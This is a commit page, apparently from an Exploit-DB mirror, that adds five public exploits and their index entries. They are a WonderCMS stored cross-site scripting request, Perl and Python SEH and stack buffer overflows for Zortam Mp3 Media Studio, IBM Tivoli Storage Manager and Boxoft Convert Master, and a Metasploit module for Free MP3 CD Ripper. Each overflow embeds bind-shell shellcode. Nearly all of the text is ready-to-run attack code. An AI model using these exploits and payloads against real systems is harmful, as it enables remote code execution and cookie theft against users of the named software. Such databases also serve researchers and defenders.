DB: 2020-11-21
5 changes to exploits/shellcodes Zortam Mp3 Media Studio 27.60 - Remote Code Execution (SEH) IBM Tivoli Storage Manager Command Line Administrative Interface 5.2.0.1 - id' Field Stack Based Buffer Overflow Free MP3 CD Ripper 2.8 - Multiple File Buffer Overflow (Metasploit) Boxoft Convert Master 1.3.0 - 'wav' SEH Local Exploit WonderCMS 3.1.3 - 'content' Persistent Cross-Site Scripting
This commit is contained in:
parent
21fa83f241
commit
c14496840d
6 changed files with 391 additions and 0 deletions
38
exploits/php/webapps/49085.txt
Normal file
38
exploits/php/webapps/49085.txt
Normal file
|
@ -0,0 +1,38 @@
|
|||
# Exploit Title: WonderCMS 3.1.3 - 'content' Persistent Cross-Site Scripting
|
||||
# Date: 20-11-2020
|
||||
# Exploit Author: Hemant Patidar (HemantSolo)
|
||||
# Vendor Homepage: https://www.wondercms.com/
|
||||
# Version: 3.1.3
|
||||
# Tested on: Windows 10/Kali Linux
|
||||
|
||||
Stored Cross-site scripting(XSS):
|
||||
Stored XSS, also known as persistent XSS, is the more damaging of the two. It occurs when a malicious script is injected directly into a vulnerable web application. Reflected XSS involves the reflecting of a malicious script off of a web application, onto a user's browser.
|
||||
|
||||
Attack vector:
|
||||
This vulnerability can results attacker to inject the XSS payload in Page description and each time any user will visits the website, the XSS triggers and attacker can able to steal the cookie according to the crafted payload.
|
||||
|
||||
Vulnerable Parameters: Page description.
|
||||
|
||||
Steps-To-Reproduce:
|
||||
1. Go to the Simple website builder.
|
||||
2. Put this payload in Page description: "hemantsolo"><img src=x onerror=confirm(1)>"
|
||||
3. Now go to the website and the XSS will be triggered.
|
||||
|
||||
POST /demo/ HTTP/1.1
|
||||
Host: 127.0.0.1
|
||||
Connection: close
|
||||
Content-Length: 196
|
||||
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
|
||||
DNT: 1
|
||||
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
||||
Accept: */*
|
||||
Origin: 127.0.0.1
|
||||
Sec-Fetch-Site: same-origin
|
||||
Sec-Fetch-Mode: cors
|
||||
Sec-Fetch-Dest: empty
|
||||
Referer: 127.0.0.1/demo/
|
||||
Accept-Encoding: gzip, deflate
|
||||
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,hi;q=0.7,ru;q=0.6
|
||||
Cookie: PHPSESSID=da4eae35135fd9ce3c413b936e2e5925
|
||||
|
||||
fieldname=description&token=c526c8235770f7efe7b7868a806f51f9a48545e117e00534e5cd82fde1bf1064&content=HemantSoloHacker%22%3E%3Cimg%20src%3Dx%20onerror%3Dconfirm(1)%3E&target=pages&menu=&visibility=
|
75
exploits/windows/local/49084.pl
Executable file
75
exploits/windows/local/49084.pl
Executable file
|
@ -0,0 +1,75 @@
|
|||
# Exploit Title: Zortam Mp3 Media Studio 27.60 - Remote Code Execution (SEH)
|
||||
# Date: November 19, 2020
|
||||
# Exploit Author: Vincent Wolterman
|
||||
# Vendor Homepage: https://www.zortam.com/index.html
|
||||
# Software Link: https://www.zortam.com/download.html
|
||||
# Version: 27.60
|
||||
# Tested on: Windows 7 Professional SP 1 Build 7601; Windows 10 Professional Build 19041
|
||||
|
||||
# Steps to reproduce crash:
|
||||
# 1) Run provided Perl code Zortam_MP3_Studio_poc.pl
|
||||
# 2) Open Zortam_Crash.txt output file
|
||||
# 3) Copy contents of text file to clipboard
|
||||
# 4) Open Zortam Mp3 Studio
|
||||
# 5) From the Menu bar -> File -> New Library
|
||||
# 6) Click ‘OK’ when prompted ‘Do you want to create a new Mp3 library?’
|
||||
# 7) Paste the contents of Zortam_Crash.txt into the ‘Select Folder’ field
|
||||
# 8) Click 'OK'
|
||||
# 9) Connect to victim machine on port 80
|
||||
|
||||
#!/usr/bin/perl
|
||||
|
||||
$baddata = "Metal's_Greatest_Hits"; # you can put whatever you need to here to convince victim (will be seen during crash)
|
||||
$baddata .= "\x90" x (268-length($baddata)); # exact overwrite at 272
|
||||
|
||||
$nseh = "\xeb\x0b\x90\x90"; # nseh overwrite JMP short 11 bytes into NOP sled
|
||||
|
||||
# 0x10015962 : pop ecx # pop esi # ret | ascii {PAGE_EXECUTE_READ} [WNASPI32.DLL] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2.0.1.50
|
||||
# (C:\Program Files\Zortam Mp3 Media Studio\WNASPI32.DLL)
|
||||
|
||||
$seh = "\x62\x59\x01\x10"; # seh overwrite
|
||||
$nop = "\x90" x 12; # NOP sled
|
||||
|
||||
# msfvenom -p windows/shell_bind_tcp LPORT=80 -b "\x00\x0a\x0d" -f perl -v payload EXITFUNC=seh
|
||||
# Payload size: 355 bytes
|
||||
|
||||
$payload =
|
||||
"\xd9\xcf\xbf\xad\x91\xa4\xe3\xd9\x74\x24\xf4\x5a\x29\xc9" .
|
||||
"\xb1\x53\x83\xc2\x04\x31\x7a\x13\x03\xd7\x82\x46\x16\xdb" .
|
||||
"\x4d\x04\xd9\x23\x8e\x69\x53\xc6\xbf\xa9\x07\x83\x90\x19" .
|
||||
"\x43\xc1\x1c\xd1\x01\xf1\x97\x97\x8d\xf6\x10\x1d\xe8\x39" .
|
||||
"\xa0\x0e\xc8\x58\x22\x4d\x1d\xba\x1b\x9e\x50\xbb\x5c\xc3" .
|
||||
"\x99\xe9\x35\x8f\x0c\x1d\x31\xc5\x8c\x96\x09\xcb\x94\x4b" .
|
||||
"\xd9\xea\xb5\xda\x51\xb5\x15\xdd\xb6\xcd\x1f\xc5\xdb\xe8" .
|
||||
"\xd6\x7e\x2f\x86\xe8\x56\x61\x67\x46\x97\x4d\x9a\x96\xd0" .
|
||||
"\x6a\x45\xed\x28\x89\xf8\xf6\xef\xf3\x26\x72\xeb\x54\xac" .
|
||||
"\x24\xd7\x65\x61\xb2\x9c\x6a\xce\xb0\xfa\x6e\xd1\x15\x71" .
|
||||
"\x8a\x5a\x98\x55\x1a\x18\xbf\x71\x46\xfa\xde\x20\x22\xad" .
|
||||
"\xdf\x32\x8d\x12\x7a\x39\x20\x46\xf7\x60\x2d\xab\x3a\x9a" .
|
||||
"\xad\xa3\x4d\xe9\x9f\x6c\xe6\x65\xac\xe5\x20\x72\xd3\xdf" .
|
||||
"\x95\xec\x2a\xe0\xe5\x25\xe9\xb4\xb5\x5d\xd8\xb4\x5d\x9d" .
|
||||
"\xe5\x60\xcb\x95\x40\xdb\xee\x58\x32\x8b\xae\xf2\xdb\xc1" .
|
||||
"\x20\x2d\xfb\xe9\xea\x46\x94\x17\x15\x68\x35\x91\xf3\x02" .
|
||||
"\xa5\xf7\xac\xba\x07\x2c\x65\x5d\x77\x06\xdd\xc9\x30\x40" .
|
||||
"\xda\xf6\xc0\x46\x4c\x60\x4b\x85\x48\x91\x4c\x80\xf8\xc6" .
|
||||
"\xdb\x5e\x69\xa5\x7a\x5e\xa0\x5d\x1e\xcd\x2f\x9d\x69\xee" .
|
||||
"\xe7\xca\x3e\xc0\xf1\x9e\xd2\x7b\xa8\xbc\x2e\x1d\x93\x04" .
|
||||
"\xf5\xde\x1a\x85\x78\x5a\x39\x95\x44\x63\x05\xc1\x18\x32" .
|
||||
"\xd3\xbf\xde\xec\x95\x69\x89\x43\x7c\xfd\x4c\xa8\xbf\x7b" .
|
||||
"\x51\xe5\x49\x63\xe0\x50\x0c\x9c\xcd\x34\x98\xe5\x33\xa5" .
|
||||
"\x67\x3c\xf0\xdb\x96\x8c\xed\x4c\x01\x65\x4c\x11\xb2\x50" .
|
||||
"\x93\x2c\x31\x50\x6c\xcb\x29\x11\x69\x97\xed\xca\x03\x88" .
|
||||
"\x9b\xec\xb0\xa9\x89";
|
||||
|
||||
|
||||
$file = "Zortam_Crash.txt";
|
||||
open (FILE, '>Zortam_Crash.txt');
|
||||
print FILE $baddata;
|
||||
print FILE $nseh;
|
||||
print FILE $seh;
|
||||
print FILE $nop;
|
||||
print FILE $payload;
|
||||
close (FILE);
|
||||
|
||||
print "Exploit file created [" . $file . "]\n";
|
||||
print "Buffer size: " . length($baddata) . "\n";
|
141
exploits/windows/local/49086.py
Executable file
141
exploits/windows/local/49086.py
Executable file
|
@ -0,0 +1,141 @@
|
|||
# Exploit Title: IBM Tivoli Storage Manager Command Line Administrative Interface 5.2.0.1 - id' Field Stack Based Buffer Overflow
|
||||
# Exploit Author: Paolo Stagno aka VoidSec
|
||||
# Vendor Homepage: https://www.ibm.com/support/knowledgecenter/en/SSGSG7_7.1.0/com.ibm.itsm.tsm.doc/welcome.html
|
||||
# Version: 5.2.0.1
|
||||
# Tested on: Windows 10 Pro v.10.0.19041 Build 19041
|
||||
|
||||
"""
|
||||
Usage: IBM Tivoli Storage Manager > in the "id" field paste the content of "IBM_TSM_v.5.2.0.1_exploit.txt" and press "ENTER"
|
||||
|
||||
PS C:\Users\user\Desktop> Import-Module .\Get-PESecurity.psm1
|
||||
PS C:\Users\user\Desktop> Get-PESecurity -file "dsmadmc.exe"
|
||||
FileName : dsmadmc.exe
|
||||
ARCH : I386
|
||||
DotNET : False
|
||||
ASLR : True
|
||||
DEP : True
|
||||
Authenticode : False
|
||||
StrongNaming : N/A
|
||||
SafeSEH : False
|
||||
ControlFlowGuard : False
|
||||
HighentropyVA : False
|
||||
"""
|
||||
|
||||
# [ buffer ]
|
||||
# [ 68 byte | EIP | rest of the buffer ]
|
||||
# ^_ESP
|
||||
"""
|
||||
EIP contains normal pattern : 0x33634132 (offset 68)
|
||||
ESP (0x0019e314) points at offset 72 in normal pattern (length 3928)
|
||||
|
||||
JMP ESP Pointers:
|
||||
0x028039eb : jmp esp | {PAGE_EXECUTE_READ} [dbghelp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v6.0.0017.0
|
||||
0x02803d7b : jmp esp | {PAGE_EXECUTE_READ} [dbghelp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v6.0.0017.0
|
||||
0x02852c21 : jmp esp | {PAGE_EXECUTE_READ} [dbghelp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v6.0.0017.0
|
||||
0x0289fbe3 : call esp | {PAGE_EXECUTE_READ} [dbghelp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v6.0.0017.0
|
||||
0x0289fd2f : call esp | {PAGE_EXECUTE_READ} [dbghelp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v6.0.0017.0
|
||||
0x028823a9 : push esp # ret 0x04 | {PAGE_EXECUTE_READ} [dbghelp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v6.0.0017.0
|
||||
"""
|
||||
|
||||
#!/usr/bin/python
|
||||
import struct
|
||||
|
||||
# 4000 bytes
|
||||
buff_max_length=800
|
||||
eip_offset=68
|
||||
"""
|
||||
BAD CHARS: \x00\x08\x09\x0a\x0d\x1a\x1b\x7f
|
||||
|
||||
GOOD CHARS:
|
||||
asciiprint \x20-\x7e
|
||||
|
||||
MOD CHARS:
|
||||
\x00 -> \x20
|
||||
,-----------------------------------------------.
|
||||
| Comparison results: |
|
||||
|-----------------------------------------------|
|
||||
| 80 81 82 83 84 85 86 87| File
|
||||
| 3f 3f 2c 9f 2c 2e 2b d8| Memory
|
||||
80 |88 89 8a 8b 8c 8d 8e 8f 90 91 92 93 94 95 96 97| File
|
||||
|5e 25 53 3c 4f 3f 5a 3f 3f 60 27 22 22 07 2d 2d| Memory
|
||||
90 |98 99 9a 9b 9c 9d 9e 9f a0 a1 a2 a3 a4 a5 a6 a7| File
|
||||
|7e 54 73 3e 6f 3f 7a 59 20 ad 9b 9c 0f 9d dd 15| Memory
|
||||
a0 |a8 a9 aa ab ac ad ae af b0 b1 b2 b3 b4 b5 b6 b7| File
|
||||
|22 63 a6 ae aa 2d 72 5f f8 f1 fd 33 27 e6 14 fa| Memory
|
||||
b0 |b8 b9 ba bb bc bd be bf c0 c1 c2 c3 c4 c5 c6 c7| File
|
||||
|2c 31 a7 af ac ab 5f a8 41 41 41 41 8e 8f 92 80| Memory
|
||||
c0 |c8 c9 ca cb cc cd ce cf d0 d1 d2 d3 d4 d5 d6 d7| File
|
||||
|45 90 45 45 49 49 49 49 44 a5 4f 4f 4f 4f 99 78| Memory
|
||||
d0 |d8 d9 da db dc dd de df e0 e1 e2 e3 e4 e5 e6 e7| File
|
||||
|4f 55 55 55 9a 59 5f e1 85 a0 83 61 84 86 91 87| Memory
|
||||
e0 |e8 e9 ea eb ec ed ee ef f0 f1 f2 f3 f4 f5 f6 f7| File
|
||||
|8a 82 88 89 8d a1 8c 8b 64 a4 95 a2 93 6f 94 f6| Memory
|
||||
f0 |f8 f9 fa fb fc fd fe ff | File
|
||||
|6f 97 a3 96 81 79 5f 98 | Memory
|
||||
`-----------------------------------------------'
|
||||
"""
|
||||
# msfvenom -p windows/shell_bind_tcp -f python -v shellcode -a x86 --platform windows -b "\x00\x08\x09\x0a\x0d\x1a\x1b\x7f" -e x86/alpha_mixed BufferRegister=ESP --smallest
|
||||
shellcode = b""
|
||||
shellcode += b"\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49"
|
||||
shellcode += b"\x49\x49\x49\x49\x49\x49\x49\x37\x51\x5a\x6a"
|
||||
shellcode += b"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51"
|
||||
shellcode += b"\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42"
|
||||
shellcode += b"\x58\x50\x38\x41\x42\x75\x4a\x49\x78\x59\x78"
|
||||
shellcode += b"\x6b\x4d\x4b\x6b\x69\x62\x54\x61\x34\x6a\x54"
|
||||
shellcode += b"\x76\x51\x6a\x72\x6c\x72\x54\x37\x45\x61\x4f"
|
||||
shellcode += b"\x39\x61\x74\x4e\x6b\x62\x51\x66\x50\x6c\x4b"
|
||||
shellcode += b"\x53\x46\x34\x4c\x6c\x4b\x32\x56\x35\x4c\x6e"
|
||||
shellcode += b"\x6b\x67\x36\x37\x78\x6e\x6b\x43\x4e\x51\x30"
|
||||
shellcode += b"\x4c\x4b\x67\x46\x74\x78\x50\x4f\x72\x38\x42"
|
||||
shellcode += b"\x55\x6c\x33\x30\x59\x56\x61\x38\x51\x39\x6f"
|
||||
shellcode += b"\x49\x71\x73\x50\x4e\x6b\x70\x6c\x31\x34\x54"
|
||||
shellcode += b"\x64\x6e\x6b\x73\x75\x67\x4c\x4e\x6b\x66\x34"
|
||||
shellcode += b"\x46\x48\x74\x38\x45\x51\x69\x7a\x4c\x4b\x31"
|
||||
shellcode += b"\x5a\x67\x68\x6e\x6b\x42\x7a\x51\x30\x46\x61"
|
||||
shellcode += b"\x6a\x4b\x68\x63\x36\x54\x47\x39\x6c\x4b\x35"
|
||||
shellcode += b"\x64\x6c\x4b\x67\x71\x5a\x4e\x74\x71\x6b\x4f"
|
||||
shellcode += b"\x64\x71\x6f\x30\x59\x6c\x6c\x6c\x6f\x74\x39"
|
||||
shellcode += b"\x50\x50\x74\x43\x37\x49\x51\x58\x4f\x34\x4d"
|
||||
shellcode += b"\x77\x71\x6f\x37\x5a\x4b\x6c\x34\x35\x6b\x53"
|
||||
shellcode += b"\x4c\x35\x74\x35\x78\x73\x45\x48\x61\x6c\x4b"
|
||||
shellcode += b"\x42\x7a\x75\x74\x66\x61\x5a\x4b\x50\x66\x4c"
|
||||
shellcode += b"\x4b\x46\x6c\x70\x4b\x4e\x6b\x31\x4a\x77\x6c"
|
||||
shellcode += b"\x76\x61\x68\x6b\x4e\x6b\x53\x34\x6c\x4b\x53"
|
||||
shellcode += b"\x31\x4a\x48\x4e\x69\x37\x34\x56\x44\x65\x4c"
|
||||
shellcode += b"\x70\x61\x38\x43\x4f\x42\x45\x58\x61\x39\x38"
|
||||
shellcode += b"\x54\x6f\x79\x48\x65\x4f\x79\x59\x52\x43\x58"
|
||||
shellcode += b"\x4c\x4e\x32\x6e\x36\x6e\x7a\x4c\x72\x72\x49"
|
||||
shellcode += b"\x78\x4f\x6f\x4b\x4f\x6b\x4f\x6b\x4f\x4e\x69"
|
||||
shellcode += b"\x42\x65\x54\x44\x6f\x4b\x73\x4e\x68\x58\x4b"
|
||||
shellcode += b"\x52\x44\x33\x6c\x47\x75\x4c\x37\x54\x42\x72"
|
||||
shellcode += b"\x4d\x38\x6e\x6e\x69\x6f\x59\x6f\x49\x6f\x6d"
|
||||
shellcode += b"\x59\x57\x35\x73\x38\x70\x68\x32\x4c\x52\x4c"
|
||||
shellcode += b"\x67\x50\x71\x51\x75\x38\x65\x63\x76\x52\x76"
|
||||
shellcode += b"\x4e\x42\x44\x61\x78\x34\x35\x54\x33\x71\x75"
|
||||
shellcode += b"\x73\x42\x70\x30\x79\x4b\x6b\x38\x61\x4c\x31"
|
||||
shellcode += b"\x34\x57\x7a\x4c\x49\x59\x76\x31\x46\x69\x6f"
|
||||
shellcode += b"\x33\x65\x67\x74\x4f\x79\x6a\x62\x32\x70\x6d"
|
||||
shellcode += b"\x6b\x4d\x78\x6f\x52\x42\x6d\x4f\x4c\x6f\x77"
|
||||
shellcode += b"\x55\x4c\x75\x74\x53\x62\x79\x78\x61\x4f\x79"
|
||||
shellcode += b"\x6f\x6b\x4f\x79\x6f\x30\x68\x42\x4f\x62\x58"
|
||||
shellcode += b"\x63\x68\x77\x50\x73\x58\x70\x61\x30\x67\x33"
|
||||
shellcode += b"\x55\x50\x42\x43\x58\x32\x6d\x70\x65\x61\x63"
|
||||
shellcode += b"\x32\x53\x76\x51\x69\x4b\x6d\x58\x33\x6c\x51"
|
||||
shellcode += b"\x34\x35\x5a\x4b\x39\x6b\x53\x72\x48\x70\x58"
|
||||
shellcode += b"\x47\x50\x55\x70\x57\x50\x42\x48\x62\x50\x63"
|
||||
shellcode += b"\x47\x70\x6e\x35\x34\x34\x71\x6f\x39\x4c\x48"
|
||||
shellcode += b"\x30\x4c\x74\x64\x67\x74\x6e\x69\x4b\x51\x54"
|
||||
shellcode += b"\x71\x58\x52\x62\x72\x36\x33\x62\x71\x71\x42"
|
||||
shellcode += b"\x79\x6f\x68\x50\x74\x71\x79\x50\x76\x30\x69"
|
||||
shellcode += b"\x6f\x50\x55\x54\x48\x41\x41"
|
||||
|
||||
buff = ""
|
||||
buff += "A" * eip_offset
|
||||
buff += struct.pack("<I",0x02c73d7b) # 0x02803d7b cause char modification needs to be written as 0x02c73d7b
|
||||
buff += shellcode
|
||||
buff += "C" * (buff_max_length - len(buff))
|
||||
|
||||
print("Writing {} bytes".format(len(buff)))
|
||||
f = open("IBM_TSM_v.5.2.0.1_exploit.txt", "w")
|
||||
f.write(buff)
|
||||
f.close()
|
66
exploits/windows/local/49087.rb
Executable file
66
exploits/windows/local/49087.rb
Executable file
|
@ -0,0 +1,66 @@
|
|||
##
|
||||
# This module requires Metasploit: https://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::FILEFORMAT
|
||||
|
||||
def initialize(info={})
|
||||
super(update_info(info,
|
||||
'Name' => "Free MP3 CD Ripper 2.6 < 2.8 (.wma.wav.flac.m3u.acc) Buffer Overflow",
|
||||
'Description' => %q{
|
||||
This module exploits a buffer overflow in Free MP3 CD Ripper versions 2.6 and 2.8.
|
||||
By constructing a specially crafted WMA WAV M3U ACC FLAC file and attempting to convert it to an MP3 file in the
|
||||
application, a buffer is overwritten, which allows for running shellcode.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'Gionathan Reale', # Exploit-DB POC
|
||||
'ZwX' # Metasploit Module
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2019-9767' ],
|
||||
[ 'EDB', '45412' ],
|
||||
[ 'URL', 'https://www.exploit-db.com/exploits/45412' ]
|
||||
],
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
[
|
||||
[
|
||||
'Windows 7 x86 - Windows 7 x64',
|
||||
{
|
||||
'Ret' => 0x66e42121 # POP POP RET
|
||||
}
|
||||
]
|
||||
],
|
||||
'Payload' =>
|
||||
{
|
||||
'BadChars' => "\x00\x0a\x0d\x2f"
|
||||
},
|
||||
'Privileged' => false,
|
||||
'DisclosureDate' => "Sep 09 2018",
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('FILENAME', [true, 'Create malicious file example extension (.wma .wav .acc .flac .m3u)', 'name.wma'])
|
||||
])
|
||||
end
|
||||
|
||||
def exploit
|
||||
file_payload = payload.encoded
|
||||
|
||||
msfsploit = make_fast_nops(4116)
|
||||
msfsploit << "\xeb\x06#{Rex::Text.rand_text_alpha(2, payload_badchars)}" # NSEH_JMP
|
||||
msfsploit << [target.ret].pack("V*") # SEH
|
||||
msfsploit << file_payload
|
||||
msfsploit << make_fast_nops(4440)
|
||||
|
||||
file_create(msfsploit)
|
||||
end
|
||||
end
|
66
exploits/windows/local/49088.py
Executable file
66
exploits/windows/local/49088.py
Executable file
|
@ -0,0 +1,66 @@
|
|||
# Exploit Title: Boxoft Convert Master 1.3.0 - 'wav' SEH Local Exploit
|
||||
# Date: 17.09.2020
|
||||
# Vendor Homepage: http://www.boxoft.com/
|
||||
# Software Link: http://www.boxoft.com/convert-master/setup(boxoft-conver=t-master).exe
|
||||
# Exploit Author: Achilles
|
||||
# Tested Version: 1.3.0
|
||||
# Tested on: Windows 7 x64
|
||||
|
||||
# 1.- Run python code :Boxoft_Convert_Master.py
|
||||
# 2.- Open Boxoft_Convert_Master.exe
|
||||
# 3.- Click try and Batch Convert Mode
|
||||
# 4.- Add Evil.wav
|
||||
# 5.- And you will have a bind shell port 4444
|
||||
# 6.- Greetings go:XiDreamzzXi,Metatron
|
||||
|
||||
#!/usr/bin/env python
|
||||
|
||||
import struct
|
||||
|
||||
buffer = "\x41" * 4132
|
||||
nseh = "\xeb\x06\x90\x90" #jmp short 6
|
||||
seh = struct.pack('<L',0x6d00c683) #CDRip122.dll
|
||||
nops = "\x90" * 20
|
||||
#Bind=shellcode port 4444
|
||||
shellcode = ("\xda\xd5\xb8\x9b\x69\x4d\xa1\xd9\x74\x24\xf4\x5a\x33"
|
||||
"\xc9\xb1\x60\x83\xc2\x04\x31\x42\x15\x03\x42\x15\x79"
|
||||
"\x9c\xf2\x9b\x0c\xb0\x35\x05\x03\x97\x32\x91\x2f\x75"
|
||||
"\x92\x10\x7e\xdf\xd5\xdf\x95\x63\xd0\x24\x96\x1e\xca"
|
||||
"\xc6\x57\x4b\xd9\xe7\x3c\xe4\x1c\xa0\xd9\x7e\x72\xe4"
|
||||
"\x38\x26\xd1\x92\x88\x79\x63\x55\xe3\x94\xfe\x9a\xac"
|
||||
"\xb5\xde\xe4\x35\xbc\xd0\x9f\xe6\x92\x63\x51\x5a\xaf"
|
||||
"\xad\x1b\xb0\xf9\x6e\x46\xac\x68\xa9\x48\xce\xb8\xe1"
|
||||
"\xd2\xf5\x1a\x7d\x84\xde\xb9\x55\xa0\xe8\xe3\xd8\xb2"
|
||||
"\x31\xfb\x1a\x0b\xea\xed\xf4\x8f\xdd\xf5\x55\xbf\x1a"
|
||||
"\xa5\xe8\xd8\xfa\xde\x45\x11\x7c\x4d\xea\x87\x0f\x9f"
|
||||
"\xe5\xdf\x90\x18\x7e\x52\x1b\xd7\x24\x22\xab\x1b\xda"
|
||||
"\x31\xa2\x75\x8f\xa3\x13\x99\x20\x5e\x07\x57\x68\x3e"
|
||||
"\x10\xc7\xc2\xb0\x2b\xa0\x13\xd6\x6a\x3e\xc3\x1e\x99"
|
||||
"\x4f\xf0\xce\x63\x50\xe3\x90\x80\x3e\x0e\x9c\x39\x7e"
|
||||
"\x48\xe6\xf0\xe7\x3b\xd3\x7d\xe3\xa3\x62\x41\xee\x19"
|
||||
"\xd0\xa8\xc9\xdb\x02\x93\x0f\x34\xb0\xad\x81\x08\x57"
|
||||
"\xce\xb8\x38\xfe\x13\xc9\xe7\x40\xc2\x17\xa6\x3a\x4c"
|
||||
"\x06\x31\xfc\x3f\x8f\xcb\x85\x84\x74\x98\x9c\x63\xe5"
|
||||
"\x46\x2f\xfc\x15\x3b\x5c\x37\xd3\x36\xfc\x39\x3c\x86"
|
||||
"\x29\x32\xbb\xb3\x04\x13\x6a\xd1\xa7\x55\xac\x8e\xa8"
|
||||
"\x05\xaf\xc3\xae\x9d\xc6\x5f\xa8\x9d\x8e\x4a\x25\x3a"
|
||||
"\x35\xa3\xd7\x4c\xaa\xb1\x87\xca\x54\x6d\xdc\xb2\xf3"
|
||||
"\x3a\xaa\x29\xea\x44\x01\x4e\xb0\x08\x9a\xd0\xb5\x69"
|
||||
"\x42\xe5\xb4\x5f\x59\xff\xb4\x90\xe2\x97\x66\x09\x89"
|
||||
"\x87\x8e\xff\xa8\x21\x68\x3f\x01\xe9\xb3\x27\x63\xd2"
|
||||
"\x93\x2f\x4d\x9c\x28\x21\xd4\x9d\xad\x8f\x24\x19\xc9"
|
||||
"\x98\xbc\x24\x0b\x47\x84\x9c\x57\xd2\x20\x79\x71\x67"
|
||||
"\xe0\xd1\xcd\x40\x51\x7d\xe2\x39\xa9\xd2\x92\x4c\x24"
|
||||
"\x59\x7b\xfd\x89\x6e\xea\xec\xc8\xac\x54\x8a\x26\x60"
|
||||
"\x81\x38\x06\x32\xab\x56\x1c\xe7\xd0\x78\xe5\xa2\x75"
|
||||
"\xc8\x28\x1b\xd5\x3f\x51")
|
||||
payload = buffer + nseh + seh + nops + shellcode
|
||||
|
||||
try:
|
||||
f=open("Evil.wav","w")
|
||||
print "[+] Creating %s bytes evil payload.." %len(payload)
|
||||
f.write(payload)
|
||||
f.close()
|
||||
print "[+] File created!"
|
||||
except:
|
||||
print "File cannot be created"
|
|
@ -11200,6 +11200,10 @@ id,file,description,date,author,type,platform,port
|
|||
48776,exploits/windows/local/48776.py,"BlazeDVD 7.0 Professional - '.plf' Local Buffer Overflow (SEH_ASLR_DEP)",2020-08-31,emalp,local,windows,
|
||||
48789,exploits/windows/local/48789.txt,"BarracudaDrive v6.5 - Insecure Folder Permissions",2020-09-03,boku,local,windows,
|
||||
49066,exploits/windows/local/49066.txt,"LCD_Service 1.0.1.0 - 'LCD_Service' Unquote Service Path",2020-11-17,"Gerardo González",local,windows,
|
||||
49084,exploits/windows/local/49084.pl,"Zortam Mp3 Media Studio 27.60 - Remote Code Execution (SEH)",2020-11-20,"Vincent Wolterman",local,windows,
|
||||
49086,exploits/windows/local/49086.py,"IBM Tivoli Storage Manager Command Line Administrative Interface 5.2.0.1 - id' Field Stack Based Buffer Overflow",2020-11-20,"Paolo Stagno",local,windows,
|
||||
49087,exploits/windows/local/49087.rb,"Free MP3 CD Ripper 2.8 - Multiple File Buffer Overflow (Metasploit)",2020-11-20,ZwX,local,windows,
|
||||
49088,exploits/windows/local/49088.py,"Boxoft Convert Master 1.3.0 - 'wav' SEH Local Exploit",2020-11-20,stresser,local,windows,
|
||||
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
|
||||
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
|
||||
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
|
||||
|
@ -43311,3 +43315,4 @@ id,file,description,date,author,type,platform,port
|
|||
49080,exploits/multiple/webapps/49080.py,"M/Monit 3.7.4 - Privilege Escalation",2020-11-19,"Dolev Farhi",webapps,multiple,
|
||||
49081,exploits/multiple/webapps/49081.py,"M/Monit 3.7.4 - Password Disclosure",2020-11-19,"Dolev Farhi",webapps,multiple,
|
||||
49082,exploits/multiple/webapps/49082.txt,"Nagios Log Server 2.1.7 - Persistent Cross-Site Scripting",2020-11-19,"Emre ÖVÜNÇ",webapps,multiple,
|
||||
49085,exploits/php/webapps/49085.txt,"WonderCMS 3.1.3 - 'content' Persistent Cross-Site Scripting",2020-11-20,"Hemant Patidar",webapps,php,
|
||||
|
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue